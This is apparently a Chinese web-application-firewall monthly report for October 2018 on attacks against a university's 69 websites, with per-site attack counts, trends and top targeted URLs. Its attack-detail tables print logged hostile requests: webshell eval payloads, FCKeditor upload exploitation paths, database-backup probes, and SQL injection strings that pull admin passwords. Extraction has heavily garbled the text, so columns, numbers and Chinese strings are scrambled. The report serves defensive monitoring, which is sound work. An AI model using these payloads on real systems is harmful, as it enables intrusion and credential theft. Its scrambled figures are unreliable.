(gonghui.xaufe.edu.//admin/index.asp、 133 cn)//data/data.asp 校医院 /config.php、/index.php、 45(/xiaoy.php、/.php、 130 ) //webconfig.txt.php 0.16%较上月减少1056次,攻击占比下降0.23%较上月减少161次,攻击占比上升0.04%较上月减少18次,攻击占比上升0.08%较上月减少97次,攻击占比上升0.05%较上月减少113次,攻击占比上升0.04%较上月增加34次,攻击占比上升0.08%较上月增加23次,攻击占比上升0.06%较上月减少307次,攻击占比下降0.03%较上月增加83次,攻击占比 第二次党代会专题//config/AspCms_Config.asp、 46网 //inc/config.asp、85 ()//admin/index.asp、//css.asp、 //data/data.asp 审计处 //config/AspCms_Config.asp、 47(//inc/config.asp、/config.php、81 ) /index.php、/web.php //config/AspCms_Config.asp、 校情民意管理平台//plus/mytag_js.php?
aid=9527、 48 //inc/config.asp、 72 ()/plus/mytag_js.php?
aid=9090、 //data/%235Dp8Gh.asp 后勤服务集团 //config/AspCms_Config.asp、 49
(houqin.xaufe.edu.c//admin/index.asp、//css.asp、32 n) //data/data.asp、//inc/config.asp 两学一做学习教育//config/AspCms_Config.asp、 50专题网 //inc/config.asp、 30 //plus/mytag_js.php?
aid=9527、 ()/plus/mytag_js.php?
aid=9090、/ 上升0.08%较上月增加63次,攻击占比上升0.05%较上月减少89次,攻击占比上升0.01%较上月减少367次,攻击占比下降0.08%较上月减少223次,攻击占比下降0.06%较上月减少620次,攻击占比下降0.18% 3.1.3文件限制 【描述】由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件 类型,导致允许攻击者向某个可通过Web访问的目录上传任意文件,会让攻 击者注入危险内容或恶意代码,并在服务器上运行。
攻击风险等级:高。
【攻击详情】 序号站点首页 1() 目的地址TOP5/tuanwei/mailto%3Aadmin%40ec、/tuanwei/mailto%3Atuanwei092% 攻击次数3133 对比分析较上月增加351次,攻击占 、/conn.inc、/connectconnect.inc、/sqlsql.inc 教务 //include/dialog/select_soft_post. php、/HYTop.mdb、/conn.inc、
2 (jiaowu.xaufe.edu.c
/connconn.inc、 636 n)/connectconnect.inc 商学院 /connect.inc、/database.inc、 3()/databasedatabase.inc、/db.inc、183 /dbdb.inc 文学院 /API/api.config、 /DATA/zblog.mdb、/DB/ddb.mdb、
4 (wenxue.xaufe.edu.c
/Data/Ylmv_data.mdb、 162 n)/DataBackup/dvbbs.mdb /HYTop.mdb、 /include/dialog/select_soft_post. php、 本科招生信息网//skin/default/images/logo.gif/1.p
5 (zhaosheng.xaufe.edhp、 151 ) //include/dialog/select_soft_post. php、 /UploadFiles/.c er //skin/default/images/logo.gif/1.p hp、 /admin/fckeditor/editor/filemana ger/browser/default/connectors/a sp/connector.asp?
Command=File Upload&Type=File&CurrentFolder =%2F、 信息与教育技术中
/admin/fckeditor/editor/filemana
6 心 ger/connectors/asp/connector.asp145 ?
Command=FileUpload&Type=Fil ()e&CurrentFolder=%2F、 /admin/fckeditor/editor/filemana ger/connectors/asp/upload.asp?
C ommand=FileUpload&Type=File& CurrentFolder=%2F、 /admin/fckeditor/editor/filemana ger/upload/asp/upload.asp?
Com mand=FileUpload&Type=File&Cur 比上升
1.41%较上月增加565次,攻击占比上升0.44%较上月增加134次,攻击占比上升0.12%较上月增加128次,攻击占比上升0.11% 较上月增加61次,攻击占比上升0.08% 较上月增加95次,攻击占比上升0.08% rentFolder=%2F //include/dialog/select_soft_post. 信息学院 php、/HYTop.mdb、
7 /PowerEasy2005.mdb、 137 ()
/PowerEasy2006.mdb、 /PowerEasy6.mdb //include/dialog/select_soft_post. php、 //skin/default/images/logo.gif/1.p 8
新闻网hp、99()/include/dialog/select_soft_post. php、//UserFiles/File/aaa
(1).cer、 /UploadFiles/.c er 审计处 /db.sql、/error.log、/database.sql、
9 (
//editor/db/%23ewebeditor.mdb、 //editor/db/ewebeditor.mdb、 /a_d/install/data.sql 体育部 //include/dialog/select_soft_post. php、/xaufe.sql、/conn.inc、 13
(/connectconnect.inc、 65 )/databasedatabase.inc 团委 //skin/default/images/logo.gif/1.p 14(tuanwei.xaufe.edu.hp、 62 cn) /include/dialog/select_soft_post. 较上月增加67次,攻击占比上升0.08% 较上月减少152次,攻击占比下降0.01% 较上月增加94次,攻击占比上升0.07%较上月增加41次,攻击占比上升0.05%较上月增加6次,攻击占比上升0.04% 较上月减少2次,攻击占比上升0.03% 较上月减少1104次,攻击占比下降0.31%较上月减少82次,攻击占比 php、 //include/dialog/select_soft_post. php、/HYTop.mdb、/backup.sql /databackup/dvbbs7.mdb、 //include/dialog/select_soft_post. 统计学院 php、 15
()/admin/data/qcdn_news.mdb、53 /bbs/databackup/dvbbs7.mdb、 /data/dvbbs7.mdb 院报-在线阅读 /include/dialog/select_soft_post. 16 php、/HYTop.mdb、/conn.inc、
53 ()/connconn.inc、/connect.inc 图书馆17() /include/dialog/select_soft_post.php、//skin/default/images/logo.gif/1.php、42/UploadFiles/File/fbf577f55d1c43748dfe69aa7587ba64.cer、mon/settings/schemas/main.cer、/files/presspoint/main.cer 实验实训教学管理//include/dialog/select_soft_post. 18中心 php、/backup.sql、/database.sql、42 ()/db.sql、// 学科办 /database.sql、/xaufe.sql、 19(xuekeban.xaufe.edu/HYTop.mdb、/backup.sql、 36 ) /bak.sql //include/dialog/select_soft_post. php、 公共管理学院 //index.php/Home/AppUpload/co 20
(gongguan.xaufe.edmmentUpload、 35 ) //index.php?
s=/admin/upload/upl oadfile、/API/api.config、 /HYTop.mdb //skin/default/images/logo.gif/1.p 21
精品课程hp、/xaufe.sql、31()//include/dialog/select_soft_post. php、/HYTop.mdb、/a.bak 22两学一做学习教育//skin/default/images/logo.gif/1.p30 下降0% 较上月增加13次,攻击占比上升0.03% 较上月增加25次,攻击占比上升0.03% 较上月减少21次,攻击占比上升0.01% 较上月增加22次,攻击占比上升0.02%较上月增加30次,攻击占比上升0.03% 较上月增加26次,攻击占比上升0.03% 较上月减少22次,攻击占比下降0%较上月减 专题网 hp、 ()/include/dialog/select_soft_post. php、/xaufe.sql、/HYTop.mdb、 /backup.sql //skin/default/images/logo.gif/1.p hp、/HYTop.mdb、 交流与合作 /include/dialog/select_soft_post. 23
(guojiao.xaufe.edu.cphp、 29 n) /admin/edit/db/ewebeditor.mdb、 /admin/editor/db/ewebeditor.md b /UploadFiles/.c er、 继续教育学院(培
/UploadFiles/File/fbf577f55d1c43 24训中心) 748dfe69aa7587ba64.cer、28 mon/settings/schemas/main ().cer、/files/presspoint/main.cer、 //include/dialog/select_soft_post. php 后勤服务集团 /HYTop.mdb、/backup.sql、 25
(houqin.xaufe.edu.c/bak.sql、/data.mdb、/data.sql26 n) /database.inc、 科研处 //include/dialog/select_soft_post. 26()php、/API/api.config、 21 /HYTop.mdb、/backup.sql /include/dialog/select_soft_post. 校友总会 php、 27
(xiaoyou.xaufe.edu.c//skin/default/images/logo.gif/1.p21 n) hp、/HYTop.mdb、/backup.sql、 /bak.sql //skin/default/images/logo.gif/1.p 一站式服务平台hp、 28 /include/dialog/select_soft_post.20 ()php、/_vti_pvt/authors.pwd、 /backup.sql、/database.sql /include/dialog/select_soft_post. 校情民意管理平台
php、 29 //skin/default/images/logo.gif/1.p20 ()hp、 //include/dialog/select_soft_post. 少30次,攻击占比下降0% 较上月增加5次,攻击占比上升0.01% 较上月增加15次,攻击占比上升0.02% 较上月增加11次,攻击占比上升0.02%较上月减少26次,攻击占比上升0.01%较上月减少76次,攻击占比下降0.01% 较上月减少1次,攻击占比下降0% 较上月减少14次,攻击占比下降0% php、/HYTop.mdb、/backup.sql //skin/default/images/logo.gif/1.p 财务信息网30() hp、/include/dialog/select_soft_post.18php、/HYTop.mdb、/backup.sql、 /bak.sql /inc/conn_db.inc、 中国(西安)丝绸/databackup/dvbbs7.mdb、 31之路研究院 /database/PowerEasy4.mdb、 18 ()/database/PowerEasy5.mdb、 /admin/data/qcdn_news.mdb //public/images/skype/skype_1.gi 合作发展处 f/1.php、 32 //skin/default/images/logo.gif/1.p
17 ()hp、/API/api.config、/HYTop.mdb、 /a_d/install/data.sql /HYTop.mdb、 //include/dialog/select_soft_post. php、 /admin/include/uploadify.php?
ta 期刊管理中心 blepre=xx&met_lang=met_lang&l 33
()&met_admin_table=met_a17 dmin_table%20where%20usertyp e=3%23&metinfo_admin_id=1&m etinfo_admin_pass=2&type=upfil e&met_file_format=jpg|pphphp、 /backup.sql、/bak.sql //skin/default/images/logo.gif/1.p 34
(ne.hp、/HYTop.mdb、/backup.sql、16 ) /bak.sql、/data.sql //skin/default/images/logo.gif/1.p35(hp、/HYTop.mdb、/backup.sql、16 )/bak.sql、/data.sql 法学院 /API/api.config、/HYTop.mdb、 36()/a_d/install/data.sql、/backup.sql、15 /bak.sql 工会 //include/dialog/select_soft_post. 37(gonghui.xaufe.edu.php、15 /include/dialog/select_soft_post. cn) php、/HYTop.mdb、/backup.sql、 较上月减少39次,攻击占比下降0.01% 较上月减少12次,攻击占比下降0% 较上月减少6次,攻击占比下降0% 较上月减少124次,攻击占比下降0.03% 较上月减少25次,攻击占比下降0%较上月减少7次,攻击占比下降0%较上月增加9次,攻击占比上升0.01%较上月增加8次,攻击占比上升 /bak.sql 管理学院 //include/dialog/select_soft_post. 38(php、/HYTop.mdb、/backup.sql、15 ) /bak.sql、/data.sql //skin/default/images/logo.gif/1.p 39(whp、/HYTop.mdb、/backup.sql、15 ) /bak.sql、/data.sql 人事处 //db.mdb、//db.sql、/HYTop.mdb、 40(/backup.sql、/bak.sql 14 ) 保卫处 //include/dialog/select_soft_post. 41(baowei.xaufe.edu.cphp、/HYTop.mdb、/backup.sql、13 n) /bak.sql、/data.sql 纪委 //include/dialog/select_soft_post. 42 php、/HYTop.mdb、/backup.sql、
13 ()/bak.sql、/data.sql 离退休人员管理处//XACJXY.gif/.php、/HYTop.mdb、43()/backup.sql、/bak.sql、/data.sql13 党委统战部 //styles/prosilver/notexist_path.cf g、//styles/prosilver/style.cfg、 44(tongzhan.xaufe.edu/HYTop.mdb、/backup.sql、 13 )/bak.sql 高等教育研究所网/HYTop.mdb、/backup.sql、45站()/bak.sql、/data.sql、/database.sql11 国有资产管理处/HYTop.mdb、/backup.sql、46()/bak.sql、/data.sql、/database.sql11 0.01%较上月减少24次,攻击占比下降0%较上月减少317次,攻击占比下降0.09%较上月减少36次,攻击占比下降0.01%较上月增加2次,攻击占比上升0.01%较上月减少2次,攻击占比上升0.01%较上月增加12次,攻击占比上升0.01% 较上月--,攻击占比-- 较上月增加4次,攻击占比上升0.01%较上月增加10次,攻击占比上升0.01% 机关党总支 /HYTop.mdb、/backup.sql、 47()/bak.sql、/data.sql、/database.sql11 基建处 /HYTop.mdb、/backup.sql、 48()/bak.sql、/data.sql、/database.sql11 教务管理 /HYTop.mdb、/backup.sql、 49()/bak.sql、/data.sql、/database.sql11 深入学习实践科学/HYTop.mdb、/backup.sql、11 50发展观专题网 /bak.sql、/data.sql、/database.sql () 较上月增加9次,攻击占比上升0.01%较上月增加7次,攻击占比上升0.01%较上月减少22次,攻击占比下降0% 较上月--,攻击占比-- 3.1.4疑似跨站攻击 【描述】攻击者利用网站漏洞把恶意脚本代码注入到网页中,当其他用户浏览这 些网页时,就会执行其中的恶意代码,对受害用户可能采取Cookies资料窃取、 会话劫持、钓鱼欺骗等各种攻击。
攻击风险等级:高。
【攻击详情】 序号
1 站点 首页() 目的地址TOP5//data/cache/asd.php、//data/cache/flye.php、//plus/read.php、//plus/result.php、/utility/convert/data/config.inc.php 攻击次数9822 //data/cache/asd.php、 新闻网 //plus/read.php、
2 ()//plus/result.php、 4263 //data/cache/flye.php、//fuck.php 体育部 //data/cache/asd.php、
3 (
//data/cache/flye.php、 2101 对比分析 较上月减少8229次,攻击占比上升1.59% 较上月减少2820次,攻击占比上升0.92%较上月减少220 ) //plus/read.php、 //plus/result.php、//fuck.php //data/cache/asd.php、 图书馆 //plus/result.php、
4 /utility/convert/data/config.inc.ph
1737 ()p、//plus/read.php、 //data/cache/flye.php //data/cache/asd.php、 本科招生信息网//data/cache/flye.php、
5 (zhaosheng.xaufe.ed//plus/read.php、 1609 ) //plus/result.php、 //plus/mytag_js.php?
aid=9527 /utility/convert/data/config.inc.ph 校友总会 p、//data/cache/asd.php、
6 (xiaoyou.xaufe.edu.c
//plus/read.php、 1472 n) //data/cache/flye.php、 //plus/result.php 研究生部 //data/cache/asd.php、 //data/cache/flye.php、
7 (yanjiusheng.xaufe.e
//plus/read.php、 1431 ) //plus/result.php、//fuck.php //plus/read.php、 经济学院 //data/cache/flye.php、
8 ()
//plus/result.php、 1367 //data/cache/asd.php、//fuck.php 教务 //data/cache/asd.php、 //data/cache/flye.php、
9 (jiaowu.xaufe.edu.c
//plus/read.php、 n) //plus/result.php、//fuck.php //data/cache/asd.php、 继续教育学院(培//data/cache/flye.php、 10训中心) //plus/read.php、 ()//plus/result.php、 //plus/moon.php //data/cache/asd.php、 信息学院 //plus/read.php、 11 //data/cache/flye.php、 ()
//plus/result.php、 //plus/moon.php 12商学院 //data/cache/asd.php、 1301125911281091 次,攻击占比上升0.81%较上月减少417次,攻击占比上升0.6%较上月减少753次,攻击占比上升0.44%较上月减少1756次,攻击占比上升0.08%较上月减少464次,攻击占比上升0.45%较上月减少3825次,攻击占比下降0.6%较上月增加187次,攻击占比上升0.6%较上月增加233次,攻击占比上升0.6%较上月减少9547次,攻击占比下降2.43%较上月增 () //plus/read.php、//data/cache/flye.php、//plus/result.php、//fuck.php //data/cache/asd.php、 精品课程 //data/cache/flye.php、 13()//plus/read.php、//fuck.php、969 //plus/result.php //data/cache/asd.php、 实验实训教学管理//data/cache/flye.php、 14中心 //plus/result.php、 884 ()/utility/convert/data/config.inc.ph p、/1.php //data/cache/asd.php、 团委 //data/cache/flye.php、 15
(tuanwei.xaufe.edu.//plus/result.php、 874 cn) //plus/read.php、 //plus/moon.php 中国(西安)丝绸//data/cache/asd.php、 16之路研究院 //plus/read.php、 821 //data/cache/flye.php、 ()//fuck.php、//plus/result.php //data/cache/asd.php、 统计学院 //plus/read.php、 17()//plus/result.php、 770 //data/cache/flye.php、//fuck.php 党委宣传部 //data/cache/asd.php、 //plus/read.php、 18
(xuanchuan.xaufe.e//plus/result.php、 671 ) //data/cache/flye.php、//fuck.php //data/cache/asd.php、 期刊管理中心 //data/cache/flye.php、 19
()//admin.php/module/action/para655 m1/$%7B@eval($_POST%5Bc%5D )%7D、//fuck.php、//plus/read.php 文学院 //data/cache/flye.php、 //data/cache/asd.php、 20
(wenxue.xaufe.edu.c//plus/read.php、 532 n) //plus/result.php、//fuck.php 加211次,攻击占比上升0.51%较上月减少1146次,攻击占比上升0.06%较上月增加139次,攻击占比上升0.41%较上月减少943次,攻击占比上升0.08%较上月减少404次,攻击占比上升0.22%较上月减少849次,攻击占比上升0.06%较上月减少184次,攻击占比上升0.22%较上月减少356次,攻击占比上升0.16%较上月减少329次,攻击占比上升0.12% 保卫处 //data/cache/asd.php、 //plus/read.php、 21(baowei.xaufe.edu.c//data/cache/flye.php、 490 n) //fuck.php、//plus/result.php 信息与教育技术中//data/cache/asd.php、 22心 //plus/read.php、443 //plus/result.php、 ()//data/cache/flye.php、//fuck.php /1.php、//data/cache/flye.php、 基建处 /index.php?
m=formguide&c=inde 23 x&a=show&formid=1&siteid=
1、
398 ()//data/cache/asd.php、 //plus/read.php //data/cache/asd.php、 管理学院 //data/cache/flye.php、 24
(//index.php/module/action/para354 ) m1/$%7B@eval($_POST%5Bc%5D )%7D、//plus/read.php、//fuck.php 公共管理学院 //data/cache/asd.php、 //data/cache/flye.php、
25(gongguan.xaufe.ed//fuck.php、//plus/read.php、351 ) //plus/result.php 人事处 /、//plus/mytag_js.php?
aid=9090、 //data/cache/flye.php、 26
(//plus/ad_js.php?
aid=8888、 319 )//plus/mytag_js.php?
aid=9527 /、//data/cache/asd.php、 档案馆 //data/cache/flye.php、 27()//plus/moon.php、 317 //plus/read.php //plus/mytag_js.php?
aid=9527、 教学评估中心 //plus/mytag_js.php?
aid=9090、/、 28 //bbs/utility/convert/data/config.i
311 ()nc.php、 //plus/ad_js.php?
aid=8888 /utility/convert/data/config.inc.ph 29经济管理虚拟仿真p、/1.php、308()/bbs/utility/convert/data/config.i nc.php、 较上月减少9722次,攻击占比下降2.75%较上月减少1126次,攻击占比下降0.16%较上月减少677次,攻击占比下降0.04%较上月减少320次,攻击占比上升0.05%较上月减少139次,攻击占比上升0.1%较上月减少510次,攻击占比下降0.02%较上月增加81次,攻击占比上升0.16%较上月减少1157次,攻击占比下降0.23%较上月增加126次,攻击占比上升 /index.php?
m=formguide&c=index&a=show&formid=1&siteid=1、/images/swfupload/images/uploadye.php 党政办公室 //data/cache/asd.php、 //data/cache/flye.php、30(dangzheng.xaufe.ed//fuck.php、//plus/read.php、296 ) //plus/result.php //data/cache/asd.php、 财务信息网 //plus/read.php、 31 //data/cache/flye.php、 289 ()
//plus/moon.php、 //plus/result.php //data/cache/asd.php、 纪委 //data/cache/flye.php、 32()//plus/read.php、 205 //plus/result.php、//fuck.php //data/cache/asd.php、 后勤服务集团 //plus/result.php、 33
(houqin.xaufe.edu.c//data/cache/flye.php、 197 n) //plus/moon.php、 //plus/read.php //plus/mytag_js.php?
aid=9527、 校情民意管理平台
//plus/read.php、 34 //plus/result.php、 180 ()//data/cache/asd.php、 //data/cache/flye.php 外国语学院首页//data/cache/asd.php、//data/cache/flye.php、 35(//fuck.php、//plus/read.php、174)//plus/result.php 工会 //data/cache/asd.php、 //data/cache/flye.php、 36(gonghui.xaufe.edu.//plus/read.php、 156 cn) //plus/result.php、//fuck.php /admin.php/module/action/para 学工部 m1/$%7B@eval($_POST%5Bc%5D 37
(xuegong.xaufe.edu.)%7D、155 /tool/zhongcaoyao/?
q=${@print( cn) eval($_POST[abc]))}、 /aaaaaaaaaaaaaa.asp;.jpg、 0.16% 较上月减
少2020次,攻击占比下降0.49%较上月减少842次,攻击占比下降0.13%较上月减少207次,攻击占比上升0.02%较上月减少130次,攻击占比上升0.04%较上月减少551次,攻击占比下降0.09%较上月减少257次,攻击占比下降0%较上月减少458次,攻击占比下降0.08% 较上月增加55次,攻击占比上升0.08% /plus/ad_js.php?
aid=8888、 /plus/mytag_js.php?
aid=511348 //data/cache/asd.php、 高等教育研究所网
//data/cache/flye.php、38站()//plus/result.php、//fuck.php、152 //plus/read.php //plus/result.php、 //data/cache/asd.php、 科研处 //data/cache/flye.php、 39
()//plus/read.php、 138 //meng/?
q={${eval%28$_POST[% 27Rainy%27]%29}} 两学一做学习教育//data/cache/asd.php、 40专题网 //plus/read.php、 138 //data/cache/flye.php、 ()//plus/result.php、//fuck.php 党委组织部 //data/cache/asd.php、 //data/cache/flye.php、41(zuzhibu.xaufe.edu.c//fuck.php、//plus/read.php、126 n)//plus/result.php //data/cache/asd.php、 离退休人员管理处//data/cache/flye.php、 42()//plus/read.php、 111 //plus/result.php、//fuck.php //data/cache/flye.php、 合作发展处 //data/cache/asd.php、 43
()//plus/moon.php、 103 //plus/read.php、//plus/result.php //data/cache/flye.php、 法学院 //data/cache/asd.php、 44
()//plus/read.php、//fuck.php、96 //plus/result.php 交流与合作 //data/cache/flye.php、 //data/cache/asd.php、 45(guojiao.xaufe.edu.c//plus/moon.php、 79 n) //plus/read.php、//plus/result.php 一站式服务平台//data/cache/asd.php、 46()//plus/read.php、 73 较上月减少205次,攻击占比下降0% 较上月减少332次,攻击占比下降0.04% 较上月减少978次,攻击占比下降0.24%较上月减少330次,攻击占比下降0.05%较上月减少410次,攻击占比下降0.08%较上月减少345次,攻击占比下降0.07%较上月减少270次,攻击占比下降0.04%较上月减少1126次,攻击占比下降0.31%较上月减少841 //plus/result.php、/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php、//data/cache/flye.php 学科办 //plus/read.php、 //plus/result.php、//test.php、 47(xuekeban.xaufe.edu//data/cache/asd.php、 66 )//data/cache/coco.php //data/cache/asd.php、 院报-在线阅读 //data/cache/flye.php、 48()//fuck.php、//plus/read.php、65 //plus/result.php /dxyylc/md5.aspx、 国有资产管理处/plus/bakup.hp、 49 /plus/mytag_j.php?
aid=6022、54 ()/plus/mytag_js.php?
aid=511348、 /plus/mytag_js.php?
aid=6022 /plus/mytag_js.php?
aid=511348、 教务管理 /plus/mytag_js.php?
aid=6022、 50 /plus/mytag_js.php?
aid=8080、
53 ()/plus/mytag_js.php?
aid=9090、 /plus/mytag_js.php?
aid=9191 次,攻击占比下降0.23% 较上月减少619次,攻击占比下降0.16%较上月增加11次,攻击占比上升0.03%较上月减少213次,攻击占比下降0.04%较上月增加44次,攻击占比上升0.04% 3.1.5SQL注入攻击 【描述】web应用程序对用户输入数据的合法性没有判断,攻击者可以在web 应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现 欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
攻 击风险等级:高。
【攻击详情】 序号站点 首页1() 目的地址TOP5/General/Department.html、/General/ietc.html、/General/pgb.html、/General/gonghui.html、 攻击次数897 对比分析较上月减少1633次,攻击占比下降 /Links/Topic.html /gk.asp?
title=瀛﹂櫌浠嬬 粛%2F**%2Fand%2F**%2F1438% 3D1438、/gk.asp?
title=瀛﹂櫌浠 嬬 粛%2F**%2Fand%2F**%2F741%
3 D438、/gk.asp?
title=涓
叡瑗垮 畨璐㈢粡瀛﹂櫌鍟嗗闄㈠ 商学院 鍛樹
2 細%27%2F**%2Fand%2F**%2F%668 ()271438%27%3D%271438、 /gk.asp?
title=瀛﹂櫌浠嬬 粛%27%2F**%2Fand%2F**%2F% 271438%27%3D%271438、 /gk.asp?
title=涓
叡瑗垮畨璐㈢ 粡瀛﹂櫌鍟嗗闄㈠鍛樹 細%2F**%2Fand%2F**%2F741%
3 D438 /About.asp?
t=学院简 介%20and%201453=1453、 /About.asp?
t=学院简 介%20and%201453=1454、 信息学院 /About.asp?
t=学院简介
3 ()
'%20and%20'1'='1、/About.asp?
t=550 学院简介'%20and%20'1'='
2、 /About.asp?
t=学院简 介%27%2F**%2Fand%2F**%2F% 271438%27%3D%271438 /news_more.asp?
bigclassname= 学术研 究%27%2F**%2Fand%2F**%2F% 271438%27%3D%271438、 /news_more.asp?
bigclassname= 学术研 外国语学院首页
究%27%2F**%2Fand%2F**%2F% 4(27741%27%3D%27438、345 /news_more.asp?
bigclassname= ) 学术研 究%2F**%2Fand%2F**%2F1438% 3D1438、 /news_more.asp?
bigclassname= 学术研 究%2F**%2Fand%2F**%2F741%
3 D438、 0.12% 较上月增
加418次,攻击占比上升0.4% 较上月减少467次,攻击占比上升0.09% 较上月增加65次,攻击占比上升0.16% /news_more.asp?
bigclassname= 教学教 务%27%2F**%2Fand%2F**%2F% 27741%27%3D%27438 /login.asp?
doing=login、 /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 /disp.asp?
dispid=%2f**%2fcOnVe Rt(int%2c(char(33)%2bchar(126)% 2bchar(33)%2b(char(65)%2bchar( 66)%2bchar(67)%2bchar(49)%2bc har(52)%2bchar(53)%2bchar(90)% 2bchar(81)%2bchar(54)%2bchar(
5 0)%2bchar(68)%2bchar(87)%2bch 基建处
5 ar(81)%2bchar(65)%2bchar(70)%2342 ()bchar(80)%2bchar(79)%2bchar(73 )%2bchar(89)%2bchar(67)%2bcha r(70)%2bchar(68))%2bchar(33)%
2 bchar(126)%2bchar(33)))、 /disp.asp?
dispid=340%27%20AnD %20sLeep%283%29%20ANd%20% 270%27%3D%270、 /HitCount.asp?
lx=Qianbo_about& id=1%20and%201=2%20union%
2 0select%20password%20from%20 qianbo_admin /search.html、 /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 /news/html/?
0'union/**/select/* */1/**/from/**/(select/**/count( *),concat(floor(rand
(0)*2),0x3a,(s elect/**/concat(user,0x3a,passwo 体育部 rd)/**/from/**/pwn_base_admin
6 (
/**/limit/**/0,1),0x3a)a/**/from336 ) /**/information_schema.tables/* */group/**/by/**/a)b/**/where' 1'='1.html、 /HitCount.asp?
lx=Qianbo_about& id=1%20and%201=2%20union%
2 0select%20password%20from%20 qianbo_admin、 /flow.php?
step=update_cart
7 经济学院 /show.asp?
id=2777%2F**%2Fand
259 较上月增加93次,攻击占比上升0.17% 较上月增加148次,攻击占比上升0.18% 较上月减 ()%2F**%2F1438%3D1438、 /show.asp?
id=2777%2F**%2Fand %2F**%2F741%3D438、 /news/html/?
0'union/**/select/* */1/**/from/**/(select/**/count( *),concat(floor(rand
(0)*2),0x3a,(s elect/**/concat(user,0x3a,passwo rd)/**/from/**/pwn_base_admin /**/limit/**/0,1),0x3a)a/**/from /**/information_schema.tables/* */group/**/by/**/a)b/**/where' 1'='1.html、 /show.asp?
id=2777%27%2F**%2F and%2F**%2F%271438%27%3D% 271438、 /show.asp?
id=2777%27%2F**%2F and%2F**%2F%27741%27%3D%
2 7438 /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 /about.asp?
T=联系我 们%27%2F**%2Fand%2F**%2F% 271438%27%3D%271438、 教务 /about.asp?
T=联系我
8 (jiaowu.xaufe.edu.c
们%27%2F**%2Fand%2F**%2F%215 n) 27741%27%3D%27438、 /about.asp?
T=联系我 们%2F**%2Fand%2F**%2F1438% 3D1438、/about.asp?
T=联系我 们%2F**%2Fand%2F**%2F741%
3 D438 实验实训教学管理
/node/、/template/、/search.jspx、213
9 中心 /info/、/template/1/bluewise/ () /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 本科招生信息网
/news/html/?
0'union/**/select/* 10(zhaosheng.xaufe.ed*/1/**/from/**/(select/**/count(202 ) *),concat(floor(rand
(0)*2),0x3a,(s elect/**/concat(user,0x3a,passwo rd)/**/from/**/pwn_base_admin /**/limit/**/0,1),0x3a)a/**/from 少
35次,攻击占比上升0.1% 较上月增加78次,攻击占比上升0.11% 较上月增加186次,攻击占比上升0.14%较上月减少3438次,攻击占比下降0.96% /**/information_schema.tables/* */group/**/by/**/a)b/**/where' 1'='1.html、 /HitCount.asp?
lx=Qianbo_about& id=1%20and%201=2%20union%
2 0select%20password%20from%20 qianbo_admin、 /flow.php?
step=update_cart、 /teshu/show.asp?
id=353%20and% 201=
1 /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 /HitCount.asp?
lx=Qianbo_about& i
1.
安全风险概况............................................................................................................................3 1.1.
安全趋势.......................................................................................................................31.2.网站安全.......................................................................................................................5
2.高级攻击威胁详情分析
..........................................................................................................
12 2.1.DDOS攻击详情..........................................................................................................122.2.CC攻击详情...............................................................................................................12
2.3.扫描攻击详情.............................................................................................................12
3.安全风险详情分析
..................................................................................................................
13 3.1.攻击类型详情分析.....................................................................................................133.2.攻击源TOP10分析.................................................................................................100
3.3.攻击区域详情分析...................................................................................................105
4.
安全建议须知........................................................................................................................
1121.安全风险概况 【防护时段】:2018-10-01至2018-10-31;【防护范围】:党委宣传部()等共69个网站,其中69个已解析,0个未解析;【防护动态】:本月所有攻击均已被玄武盾拦截,网站共出现0起安全事件;【整体安全趋势】:本月网站群共计受到攻击138994次,较上月减少190293次,攻击趋势有所缓和; 在风暴中心提供的专业、稳定云防护服务下,网站所有攻击均被有效阻断,未造成攻击成功或篡改成功的安全事件,有效地保障网站安全、平稳地运行。
1.1.安全趋势 其中拦截到的攻击次数越多,表示网络环境遭受黑客攻击的次数越多,网络环境越不安全,黑客能成功入侵的可能性越大,使用玄武盾云防护系统能有效抵御黑客利用已存在漏洞发起的攻击。
每日攻击趋势图: 1200010000 8000600040002000
0 网站群受攻击趋势 根据风暴中心拦截攻击情况来看,该站群主要受到20时、21时、22时的攻击量最多。
攻击时间段趋势图: 各个时间段攻击量趋势图 1200010000 8000600040002000
0 1.2.网站安全 期间合同站点累计遭受138994次攻击,主要攻击目标为首页(,攻击量32883次,占比23.66%)、新闻网(,攻击量10384次,占比7.47%)、商学院(,攻击量5819次,占比4.19%)等站点,以上攻击被有效阻断,未造成攻击成功或篡改成功的安全事件。
业务系统遭受攻击分布 其他 序号12 站点 首页(www.xaufe.edu) 新闻网(news.xaufe.edu) 攻击类型TOP5 疑似跨站攻击(9822),命令注入攻击(6301),一句话webshell(5050),文件限制(3133),扫描工具(2337)疑似跨站攻击(4263),一句话webshell(3246),恶意user-agents(835),扫描工具(740),协议违规(699) 攻击次数3288310384 攻击占比23.66%7.47% 对比分析 较上月减少87156次,攻击占比下降12.79% 较上月减少8423次,攻击占比上升1.76% 风险等级高 高 协议违规(1138),疑 商学院 似跨站攻击(1091), 命令注入攻击(858),
3 (sxy.xaufe.edu.c一句话 5819 n) webshell(822),SQL 注入攻击(668) 一句话 本科招生信息webshell(2361),疑似 网 跨站攻击(1609),恶
4 (zhaosheng.xauf意user-agents(297),5462 ) 扫描工具(292),SQL 注入攻击(202) 疑似跨站攻击 体育部 (2101),命令注入攻 击(1367),一句话
5 (tiyubu.xaufe.ed
webshell(1105),SQL5344 ) 注入攻击(336),恶意 user-agents(142) 疑似跨站攻击 教务 (1301),一句话 webshell(1231),恶意
6 (jiaowu.xaufe.ed
user-agents(759),文4970 ) 件限制(636),协议违 规(316) 一句话 研究生部 webshell(1504),疑似 跨站攻击(1431),恶
7 (yanjiusheng.xau
意user-agents(728),4955 ) 协议违规(534),命令 注入攻击(316) 疑似跨站攻击 图书馆 (1737),一句话 webshell(1219),命令
8 (注入攻击(883),协议4776 ) 违规(379),跨站脚本 攻击(143) 命令注入攻击 校友总会 (1576),疑似跨站攻 击(1472),一句话
9 (xiaoyou.xaufe.e
